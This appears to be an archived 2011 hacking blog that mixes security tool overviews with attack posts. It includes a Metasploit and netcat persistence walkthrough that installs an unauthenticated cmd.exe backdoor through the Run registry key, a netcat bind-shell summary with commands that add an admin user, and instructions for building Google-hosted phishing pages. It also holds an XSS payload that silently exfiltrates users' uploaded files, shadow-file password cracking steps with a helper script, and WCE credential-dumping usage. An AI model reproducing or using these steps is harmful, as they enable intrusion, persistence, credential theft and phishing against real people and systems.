Mar 11, 2011

7 Best Security Tools In Ubuntu

Ubuntu is a computer operating system based on GNU/Linux. It is free and open source and is developed by a community. Ubuntu is available for both desktop and server use, and it is easy to install from a flash drive or a CD.

Security is the main concern of our blog, so in this article we will talk about the security tools that are available in Ubuntu's package repositories. To install a tool, open a terminal (Applications->Accessories->Terminal) and run the command given below it; each command also works with apt-get in place of aptitude.

Wireshark - Network Traffic Analyzer
A sniffer, also called a packet analyser, is a tool used to capture the incoming and outgoing traffic on a network interface. To get Wireshark on Ubuntu type:
sudo aptitude install wireshark
Capturing needs raw access to the interface. Rather than running the whole GUI as root, run "sudo dpkg-reconfigure wireshark-common", answer Yes to the question about letting non-superusers capture packets, and add your user to the wireshark group.

Nessus - Remote network security auditor
Nessus is a world-class active vulnerability scanner used for configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. To install Nessus on Ubuntu type in a terminal:
sudo aptitude install nessus
Note that the nessus package in Ubuntu's repositories (where it is still available) is the old GPL 2.x branch; the current Nessus is closed source and is distributed by Tenable as a .deb from their own site.

Nmap - The Network Mapper
Nmap, the network mapper, is a world-class tool for network exploration and security auditing; it is open source and freely available. Administrators also find it useful for network inventory and for monitoring hosts on the network, and it can fingerprint the operating system running at a given IP address (-O, which needs root). To get Nmap on Ubuntu type:
sudo aptitude install nmap 

Kismet - Wireless 802.11b monitoring tool
Kismet is a wireless network detector, sniffer and intrusion detection system; it works at the data link layer of the OSI model and needs a card and driver that support monitor mode. To get Kismet on Ubuntu type:
sudo aptitude install kismet

Netcat - TCP/IP swiss army knife 
Netcat, commonly known as the swiss army knife of TCP/IP, is used for many purposes: monitoring inbound and outbound TCP and UDP traffic, DNS forward and reverse checking, port scanning (-z), simple client/server testing and more. To get netcat on Ubuntu type:
sudo aptitude install netcat 

John the Ripper

John the Ripper is a free and open source password cracker; it offers wordlist (dictionary) and incremental (brute force) modes as well as the single-crack mode it starts with. Administrators use it to find weak passwords. To install john in Ubuntu type:

sudo aptitude install john  

Snort - Flexible Network Intrusion Detection System
Snort is a network intrusion detection system; we have previously shared an article on intrusion detection. To install snort on Ubuntu type:
sudo aptitude install snort  

Alert by twitter when you get the session with Metasploit.

In this video I show a PoC of "Alert to my twitter when I get the session with Metasploit". I created this video 2 months ago.

If you want to do something like this, try it.

Mar 10, 2011

Netcat Persistence After Exploit

After I watched "Uploading A Backdoor Metasploit Netcat" by avhackers0, I summarised it like this.

1. Exploit with Metasploit and get a session.
2. Interact with the session.
3. Upload nc.exe to the victim (the file name must match the one used in the Run key below).
   meterpreter> upload nc.exe C:\\WINDOWS\\SYSTEM32\\
4. Modify the registry so that nc starts in listen mode at every logon (-L re-listens after each client disconnects, -d detaches from the console, -e cmd.exe hands the connection a shell; the value name contains a space, so quote it).
   meterpreter> reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v "Windows Live" -d "C:\\WINDOWS\\SYSTEM32\\nc.exe -L -d -p 5555 -e cmd.exe"
5. Check the registry.
   meterpreter> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
6. The next time the victim reboots and logs on, netcat listens on port 5555 and attaches cmd.exe to whoever connects. The host firewall has to allow inbound 5555 for this to work, and note that the shell is unauthenticated: anyone who can reach the port gets it, not only you.
7. Connect to the victim with
   nc $victimip 5555

Mar 9, 2011

“Phishing” with Google

In this post I’ll explain how you can make a “phishing” page on (  It’s very easy.  Anyone can create a fake but realistic-looking web page in only 5 minutes and use it to steal important information from victims, or to push keyloggers / stealers / RATs / viruses / etc. on them.
What you must do:
1. Search for a “custom google search” code:
<input type="hidden" name="client" value="pub-9434712357021925"></input>
<input type="hidden" name="forid" value="1"></input>
<input type="hidden" name="channel" value="8358634924"></input>
<input type="hidden" name="ie" value="ISO-8859-1"></input>
<input type="hidden" name="oe" value="ISO-8859-1"></input>
<input type="hidden" name="cof" value="GALT:#008000;GL:1;DIV:#FFFFFF;VLC:663399;AH:center;BGC:FFFFFF;LBGC:D45521;ALC:0000FF;LC:0000FF;T:000000;GFNT:0000FF;GIMP:0000FF;LH:40;LW:100;L:;S:http://;LP:1;FORID:1"></input>
<input type="hidden" name="hl" value="en"></input>
The cof value is what matters: it is a list of key:value display settings that Google's results page honours as given, so the colours and the logo image (L: is the image URL, S: the link it points to) are attacker-controlled while the page itself is served from a google.com address.
URL example:
  • BGC:000000; -> background colour
  • AH:center; -> position of the image
  • LW:150; -> width of the image
  • LH:150; -> height of the image etc.
Let’s see a simple page:

Hmm, is the URL too easy to read? If so, we can add some random characters:
Much better.
Now with some imagination and a fake sent-mail inbox you can do “beautiful” things.

Google Chrome Security Update – Phishing Page


Linux Password Cracking [Backtrack4 User]

1. Get the /etc/passwd and /etc/shadow files with your skills (shadow is readable only by root, so this is the step that needs root or a privilege escalation).
2. Go to /pentest/passwords/jtr
3. Use the unshadow command to combine the shadow and passwd files into the single-file format john expects
    ./unshadow passwd shadow > combine-passwd
4. Use john to crack the passwords (by default it runs single-crack, then wordlist, then incremental mode; Ctrl-C stops it and the session can be resumed later with ./john --restore)
    ./john combine-passwd
5. Show the cracked passwords
   ./john -show combine-passwd
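As an added example (not from the original post, and not John the Ripper's own code), here is a pure-Python version of step 3 together with a check that tells you which of the merged entries are worth spending cracking time on: accounts whose hash field is "*", "!" or "x" have no crackable password and only slow john down. The passwd and shadow lines are constructed for the example; the hash strings are placeholders, not real hashes.

```python
# Added example: a small pure-Python equivalent of John the Ripper's `unshadow`,
# plus a filter for which merged entries are actually crackable.
# The sample files below are constructed for this example; the "$6$..." values
# are placeholders, not real sha512crypt hashes.

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
svc:x:1002:1002::/var/lib/svc:/usr/sbin/nologin
"""

SHADOW_SAMPLE = """\
root:$6$saltsalt$PLACEHOLDERHASHROOTxxxxxxxxxxxxxxxxxxxxxxxx:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
alice:$6$othersalt$PLACEHOLDERHASHALICExxxxxxxxxxxxxxxxxxxx:15000:0:99999:7:::
bob:!:15000:0:99999:7:::
"""

# Hash-field values that mean "no password to crack here"
LOCKED_MARKERS = {"", "*", "!", "!!", "x"}


def parse_colon_file(text):
    """Return {username: [fields...]} for a passwd- or shadow-style file."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def unshadow(passwd_text, shadow_text):
    """Replace the 'x' in passwd's second field with the hash from shadow.

    Output lines keep the 7-field passwd layout john reads (GECOS, home and
    shell are used by john's single-crack mode).  Users with no shadow entry
    keep whatever passwd had, which is normally 'x'.
    """
    shadow = parse_colon_file(shadow_text)
    merged = []
    for name, fields in parse_colon_file(passwd_text).items():
        if len(fields) < 7:
            continue  # malformed passwd line; the real tool warns and skips it
        if name in shadow and len(shadow[name]) > 1:
            fields = fields[:1] + [shadow[name][1]] + fields[2:]
        merged.append(":".join(fields))
    return "\n".join(merged) + "\n"


def crackable_users(merged_text):
    """Names whose merged hash field is an actual hash rather than a lock marker."""
    users = []
    for line in merged_text.splitlines():
        fields = line.split(":")
        h = fields[1]
        # "!<hash>" is a locked account: the hash is there but the login is
        # disabled, so skip it as well.
        if h in LOCKED_MARKERS or h.startswith("!"):
            continue
        users.append(fields[0])
    return users


if __name__ == "__main__":
    combined = unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE)
    print(combined, end="")
    print("worth cracking:", crackable_users(combined))
```

Feeding only the accounts listed by crackable_users() to john (or commenting the others out of the combined file) avoids burning wordlist time on service accounts that can never be logged into.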

XSS-Track now steals your uploaded files with HTML5 power!

HTML5, broadly speaking (actually it's XMLHttpRequest Level 2, which is not part of the HTML5 spec, but who cares?), has yet another neat feature: it allows you to send files through AJAX requests. Of course, cross-domain communication is also possible. Which is generally a good thing... unless you have an XSS on your site, because the injected script can now capture the files your users intend to upload and send them to a third-party server as well.

Which is exactly what I have done in the newest XSS-Track. Now you can append the files=1 parameter to the script URL (e.g. ) and it will monitor the site for any <input type="file" /> elements. When one of them fires a change event (e.g. because the user chose a file from their hard drive), it will quietly start uploading the chosen file's metadata (name, size, MIME type) and its contents to log.php.

Since the user will be doing twice as many uploads (one for the legitimate site, one for us), XSS-Track does not wait for the form to actually be submitted but starts quietly uploading as soon as the field changes.


This also works for <input type="file" multiple />. The supporting browsers that I'm aware of are currently:
  • Chrome,
  • FF 3.6 (metadata only)
  • FF 4.0
  • ... and many more in the future as HTML5 is coming :)
Of course, if a browser doesn't support AJAX file upload, it will stay quiet. The log.php script stores the files in the captured_files subdirectory.


Go on, try it now!

Vulnerable application:

Payload (paste into textarea):
</textarea><script src="//">

Monitoring (you will only see your own IP actions):

Clearing logs:

Source code:


USB driver bug exposed as "Linux plug&pwn"

Rafael Dominguez Vega of MWR InfoSecurity has reported a bug in the Caiaq USB driver which could be used to gain control of a Linux system via a USB device.

The bug is caused by the device name being copied into an 80-byte memory area using strcpy() without its length being checked. A crafted device with a long device name could thus write beyond the limits of this buffer, allowing it to inject and execute code. Because the driver is included in, and automatically loaded by, most Linux distributions, an attacker would merely have to connect such a device to a Linux system's USB port to execute code in kernel mode.
MWR says that it has assembled a suitable USB device for this purpose, boasting in a tweet of a "Linux plug&pwn". Their derision is not entirely misplaced: buffer overflows arising from the use of strcpy() are something of a 20th century problem. Microsoft, for example, placed the function on its list of banned function calls some years ago, with the result that developers can no longer check in code containing the incriminating function. The fact that this function call was used in a Linux kernel driver and only replaced by the safer, length-checking strlcpy() on 14 February 2011 is not a ringing endorsement of its quality.
To exploit this vulnerability, an attacker would nonetheless require physical access to the target system. Despite this limitation, such vulnerabilities are apparently highly sought after. US security company HBGary developed a complete framework for spying on and compromising computers via USB, FireWire and other ports under the codename Task B. The main customer for this was defence contractor General Dynamics, which supplies a range of US military and intelligence agencies. Target price: around $400,000.
In one email, a General Dynamics employee described two key deployment scenarios: in the first, a person leaves their laptop unattended in a locked state, allowing an attacker to briefly insert and then remove an appropriate device. In the second, the device is secretly inserted into a dormant PC, where it will hopefully remain undetected when the computer is turned back on and can be collected at a later date. Both scenarios bypass full disk encryption, because the computer is accessed while it is running, with the system transparently decrypting all files.


Mar 8, 2011

Malware Domain List

I'm interested in sites which are posting links to malware sites.
For example:
I'm using these sites to download fresh, current malware samples, and I need more sources.

Please share links to such sites, if you have one.
Now I'm getting samples from the following sites:


Netcat - the magical tool

It is not possible to describe all the functionality of netcat in one post. But one thing is for sure: it is magic.
Let's start from the beginning. Netcat is a program that can read and write data across network connections.
You can read all about it here. And if it doesn't sound interesting, trust me, it is a hacker's tool. The only way to understand it is to download it and play with it. There are versions for Windows, Linux and Mac OS, all free, so it will be easy to find one for your OS. Type "nc" in a console to find out whether you already have it installed.
If everything is OK and you installed it successfully, check out my favourite videos on YouTube about netcat.

Summary From The Video:
Act as Server: nc -lvp $PORTNUMBER -e cmd.exe
Connect to Server: nc -vv $IPADDRESS $PORTNUMBER
Add User: net user username /add
Add User To Administrators Group: net localgroup administrators username /add

Note that -e (run a program with its input and output attached to the connection) is only present in the Windows build and in the "traditional" netcat builds that enable it; the OpenBSD netcat that many Linux distributions install as nc does not have it.

Netcat is a powerful tool, take your time with it and it will reward you.


How to capture data and passwords of unsecured wireless networks with SniffPass and SmartSniff

In the release details, I also specified that a 'Wifi Monitor Mode' button was added for using 'Monitor Mode' under Windows Vista/7/2008, but without giving an extensive explanation of how to use this feature. So in this blog post I'll add more details about 'Wifi Monitor Mode' and how to use it in SmartSniff and SniffPass.

When a wireless network card enters 'Monitor Mode', it listens on a specific channel that you choose and captures all the packets sent by wireless networks in your area on that channel. If the network that sent a packet is unsecured (no WEP/WPA encryption), SmartSniff and SniffPass will be able to show you the packet data.
Before I explain how to use this mode, here are the system requirements for 'Monitor Mode':
  1. Unfortunately, this mode is only supported on Windows Vista, Windows 7 and Windows Server 2008. Windows XP is not supported.
  2. Both the network card and the device driver must support this mode. I currently don't have a list of network cards that support monitor mode under Windows; however, if you manage to get your card into monitor mode, it would be nice if you posted your card model as a comment to this blog post.
    Also, be aware that according to Microsoft, some Wifi drivers may cause a system crash when entering monitor mode.
Finally, here are the instructions for using 'Wifi Monitor Mode' with SmartSniff and SniffPass:
  1. First, download and install the latest version of Microsoft Network Monitor 3.x if it's not already installed on your system.
  2. Run SmartSniff if you want to capture general TCP data, or SniffPass if you only want to capture passwords. Be aware that SniffPass can only capture passwords that are sent unencrypted. Most web sites and services of large companies use SSL to encrypt the login, and thus SniffPass cannot capture those passwords.
  3. Go to the 'Capture Options' window (F9), choose 'Network Monitor Driver 3.x' as the capture method, and then click the 'Wifi Monitor Mode' button.
  4. In the 'Wifi Scanning Options' window that opens, choose the right wireless card (in most cases you have only one) and then check the 'Switch to Monitor Mode' option.
  5. You can now select whether to scan a single channel or to switch between multiple channels every x milliseconds. After you have selected the desired channels, click the Apply button.
    Wifi Scanning Options
  6. The most important thing: leave this window open!
    When you close this window, the network card exits monitor mode and returns to its normal state.
  7. In the 'Capture Options' window of SmartSniff/SniffPass, select the right wireless card and then press 'OK'.
  8. Finally, press F5 to start the capture. If there are any active unsecured networks in your area, you'll see the captured data.
  9. After you finish, close the 'Wifi Scanning Options' window so that your wireless card returns to normal.
The information in this article is provided for educational purposes only and to make people aware of the risks of using unsecured wireless networks. It is not intended to be used for any illegal activity.


TIGERBLOOD #Winning with Metasploit

Yes, just when you thought Charlie Sheen was about to dethrone Chuck Norris as the king of the internet.... I present to you the 0wn everything script, brought to you by Tigerblood and #Winning!
I thought long and hard (at least 20 seconds... no really, I did) about releasing this on the internet. Sometimes you just have to believe and start #winning.

The script –> /exploit/multi/everything/tigerblood.rb

* Please note... this is a dangerous script, as can be seen from the fact that it takes no RHOST input. It owns without mercy.... you have been warned!


WCE v1.1 is out!

Windows Credentials Editor v1.1
(c) 2010, 2011 Amplia Security - written by Hernan Ochoa

Windows Credentials Editor (WCE) allows you to list logon sessions and add, change, list and delete the associated credentials (e.g. LM/NT hashes). This can be used, for example, to perform pass-the-hash on Windows and also to obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used in further attacks.

WCE v1.1 supports obtaining logon sessions and NTLM credentials just by reading memory, without performing code injection.

Supported Platforms
Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008

This tool requires administrator privileges.

Windows Credentials Editor provides the following options:

    -l        List logon sessions and NTLM credentials (default).
    -s        Changes NTLM credentials of current logon session.
              Parameters: <username>:<domain>:<lmhash>:<nthash>.
    -r        Lists logon sessions and NTLM credentials indefinitely.
              Refreshes every 5 seconds if new sessions are found.
              Optional: -r<seconds> sets the refresh interval.
    -c        Run <cmd> in a new session with the specified NTLM credentials.
              Parameters: <cmd>.
    -e        Lists logon sessions NTLM credentials indefinitely.
              Refreshes every time a logon event occurs.
    -o        Saves all output to a file.
              Parameters: <filename>.
    -i        Specify LUID instead of using the current logon session.
              Parameters: <luid>.
    -d        Delete NTLM credentials from logon session.
              Parameters: <luid>.
    -a        Use Addresses.
    -f        Force 'safe mode'.
    -v        Verbose output.


    * List current logon sessions

C:\>wce -l
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa
Use -h for help.


    * List current logon sessions with verbose output enabled

C:\>wce -l -v
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa
Use -h for help.

Current Logon Session LUID: 00064081h
Logon Sessions Found: 8


    * Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa
Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: adomain
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa
Use -h for help.

Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: adomain
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa
Use -h for help.

NTLM credentials successfully deleted!

    * Run WCE indefinitely, waiting for new credentials/logon sessions.
    Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

    * Run WCE indefinitely, waiting for new credentials/logon sessions
    Refresh is every 5 seconds by default.

C:\>wce -r

    * Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes every 5 seconds)

C:\>wce -r1

A separate helper tool can be used to obtain automatically the addresses WCE needs in order to read logon sessions and NTLM credentials from memory.

The addresses obtained can then be passed to WCE with the -a (Use Addresses) switch.

This tool requires the dlls symsrv.dll and dbghelp.dll available from the
"Debugging Tools for Windows" package.



Embedded JavaScript in SWF

In a blog published in November titled “Explore the CVE-2010-3654 matryoshka“, we discussed a 0-day Shockwave (SWF) exploit that uses JavaScript to do malicious actions. In this blog, we discuss another advanced way SWF malware is combined with JavaScript only this time, without using a 0-day exploit.

In January we noticed a very large spike in telemetry for a threat named Trojan:SWF/Jaswi.A. Going back to December 2010, we had picked up a few spikes for this issue: one around Christmas, a second after New Year's, and then a third and largest spike the weekend after New Year's:

Image 1a – Prevalence chart for Trojan:SWF/Jaswi.A

When we looked deeper into the targets of these attacks, we discovered that they were predominantly reported by computers in South Korea. Since the beginning of this year, 89% of the targets were in South Korea with 75% of them specifically in Seoul. Here’s a chart with a breakdown by unique machines in the months January and February of this year (there has been no activity in March):

Image 1b – Attack attempts by unique machines in the months January and February of 2011

Interested in the anomaly, I decided to have a look. After spending some time reviewing it, an interesting thing emerged. The malware Trojan:SWF/Jaswi.A is unlike other SWF malware; other SWF malware typically calls "getURL <website address>" within an ACTION tag in order to visit a malicious link without user consent. For more about this, see the following:
Trojan:SWF/Jaswi.A contains embedded malicious JavaScript that uses a legitimate Windows API call to trigger the payload. Although the analysis was only slightly involved, let's take a simple step-by-step tour of the malware.

1. SWF with embedded JavaScript
Image 2 – Embedded JavaScript within Trojan:SWF/Jaswi.A

If we convert the JavaScript into ActionScript, it should appear as below:
Image 3 – JavaScript from Image 2 converted to ActionScript illustrating the Windows API call

From the image above, we can see that a legitimate function has been used to carry out the JavaScript injection. This is not a new method, but only a few SWF malware families take advantage of it.

2. JavaScript obfuscation
We notice the embedded JavaScript is also simply obfuscated with String.fromCharCode(). After decoding, the real JavaScript code appears (edited below):

Image 4 – Decoded JavaScript with black-outs added

Looks familiar? Yes, the Microsoft Internet Explorer vulnerability CVE-2010-0806 (the iepeers.dll use-after-free fixed in MS10-018) has been abused! This exploit affects Microsoft Internet Explorer versions 6, 6 SP1 and 7, and could allow a remote attacker to execute arbitrary code.

3. Shellcode
In Image 4 above, you can see a %u-escaped string decoded with unescape(). This is the shellcode body, which includes a simple XOR routine to evade detection. Working through the obfuscation, we finally see the destination, shown below:

Image 5 – Destination URL indicating an executable named "uusee.exe"

The file "uusee.exe" from the obfuscated URL shown above is actually a password stealer prevalent in China, which Microsoft antimalware technologies detect as PWS:Win32/Lolyda.AU (SHA1: 0bd98a39c2eaa9c523e41cec250623b44f6d3239).
We mentioned the embedded JavaScript technique used in the malicious SWF here because it appears to be a trend and may become a popular method. As always, use caution while surfing the Interwebs and use on-access antimalware protection from a credible scanner (for more information on antimalware software, see
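The two decoding steps described above (String.fromCharCode() hiding the JavaScript, unescape() hiding XOR-wrapped shellcode) are mechanical enough to script. The block below is an added example, not code from the original analysis or from the malware: it strips both layers and brute-forces a single-byte XOR key until an http:// URL falls out. The JavaScript snippet, shellcode bytes, key and TEST-NET URL are all constructed for the example; only the file name uusee.exe comes from the post.

```python
import re
import struct
from typing import Optional, Tuple

# Added example (not from the original analysis): undo the two obfuscation
# layers the post describes.  All sample data below is constructed.

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
PERCENT_U_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def decode_fromcharcode(js: str) -> str:
    """Replace every String.fromCharCode(n, n, ...) call with its literal text."""
    def repl(m):
        codes = [int(n) for n in m.group(1).replace(" ", "").split(",") if n]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return FROMCHARCODE_RE.sub(repl, js)


def decode_unescape(s: str) -> bytes:
    """Turn a %uXXXX / %XX escape string into the bytes JS would hold in memory.

    unescape() yields UTF-16 code units; shellcode relies on each %uXXXX unit
    being stored little-endian, so %u9090 becomes the bytes 90 90.
    """
    out = bytearray()
    pos = 0
    for m in PERCENT_U_RE.finditer(s):
        if m.start() != pos:
            raise ValueError("unexpected characters at offset %d" % pos)
        if m.group(1):
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    return bytes(out)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_url_xor(data: bytes) -> Optional[Tuple[int, str]]:
    """Try every single-byte XOR key; return (key, url) when an http URL appears."""
    for key in range(256):
        plain = xor_bytes(data, key)
        m = re.search(rb"https?://[\x21-\x7e]+", plain)
        if m:
            return key, m.group(0).decode()
    return None


# --- constructed sample --------------------------------------------------
# Char codes spell out "var u=1;" (a stand-in for the real exploit code).
SAMPLE_JS = "eval(String.fromCharCode(118,97,114,32,117,61,49,59))"
SAMPLE_URL = b"http://192.0.2.10/uusee.exe"   # TEST-NET address, not a real host
SAMPLE_KEY = 0x5A


def percent_u_encode(data: bytes) -> str:
    """Inverse of decode_unescape; only used here to build a well-formed sample."""
    if len(data) % 2:
        data += b"\x00"
    return "".join("%%u%04x" % struct.unpack("<H", data[i:i + 2])[0]
                   for i in range(0, len(data), 2))


# Three NOPs followed by the XOR-wrapped URL, the way a decoder stub would see it.
SAMPLE_SHELLCODE = percent_u_encode(b"\x90\x90\x90" + xor_bytes(SAMPLE_URL, SAMPLE_KEY))

if __name__ == "__main__":
    print(decode_fromcharcode(SAMPLE_JS))
    raw = decode_unescape(SAMPLE_SHELLCODE)
    print(find_url_xor(raw))
```

On a real sample the URL regex is usually enough to pick the right key out of 256 tries; when the payload uses a multi-byte key or a rolling XOR, the same search is run per key position instead of over the whole buffer.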


Mar 7, 2011

Metasploit v.3.6.0 Released

All Metasploit editions are seeing an update to version 3.6 today, including an enhanced command-line feature set for increased proficiency and detailed PCI reports with pass/fail information for a comprehensive view of compliance posture with PCI regulations.

This release adds 15 new exploits for a total of 64 new modules since version 3.5.1. All editions of Metasploit now include Post Exploitation modules that provide local exploits and additional data gathering capabilities. Metasploit Express and Metasploit Pro users benefit from the Project Activity Report and Global Search capabilities now available in the user interface. Metasploit Pro users now have access to the new Pro Console, PCI Report, and Asset Tagging features. The full release notes for the open source framework can be found online.

More info and download:

Shell script for update path /pentest/ in Backtrack4

This is a script that I created to update /pentest/$APP in Backtrack4 with svn update. Only directories that are Subversion working copies (they contain .svn) are touched, and each svn update runs in a subshell so that a failing cd cannot leave the next iteration running in the wrong directory.

#!/bin/bash
for deep1 in /pentest/*; do
        for deep2 in "$deep1"/*; do
                [ -d "$deep2/.svn" ] || continue   # skip anything that is not an svn checkout
                echo "Updating: $deep2"
                (cd "$deep2" && svn update)
        done
done